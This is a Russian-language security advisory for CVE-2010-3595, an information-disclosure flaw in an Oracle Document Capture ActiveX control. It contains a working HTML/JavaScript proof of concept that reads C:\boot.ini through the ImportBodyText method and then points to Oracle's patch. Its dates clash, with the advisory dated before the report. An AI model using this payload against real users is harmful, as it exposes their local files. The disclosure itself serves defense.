CVE-2010-3595

Вендор

Oracle

Продукт

Oracle Document Capture 10.1350.0005 

Тип уязвимости

Раскрытие информации

Reported

29.01.2010

Date of Public Advisory

24.01.2010

Автор

Алексей Синцов

Детальное описание

Например, если ввести имя файла  "C:\\boot.ini" в метод "ImportBodyText", то это файл будет открыт и прочитан, а его содержание загрузится в параметр "BodyText"

Class EasyMailSMTPObj 
GUID: {68AC0D5F-0424-11D5-822F-00C04F6BA8D9} 
Number of Interfaces: 1 
Default Interface: IEasyMailSMTPObj 
RegKey Safe for Script: True 
RegKey Safe for Init: True 
KillBitSet: False 

Пример
********* 
<HTML> 
<HEAD> 
<TITLE>DSECRG</TITLE> 
</HEAD> 
<BODY> 

<OBJECT id='ora' classid='clsid:68AC0D5F-0424-11D5-822F-00C04F6BA8D9'></OBJECT> 

<SCRIPT> 

function Exploit(){ 
ora.ImportBodyText("C:\\boot.ini");        
document.write("Try to read c:\\boot.ini:<br><br>"+ora.BodyText); 
} 
Exploit(); 

</SCRIPT> 
</BODY> 
</HTML> 

Решение
**********
Информация была опубликована в CPU, Январь 2011.
Клиенты могут загрузить патчи CPU, следуя инструкциям по ссылке:
http://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html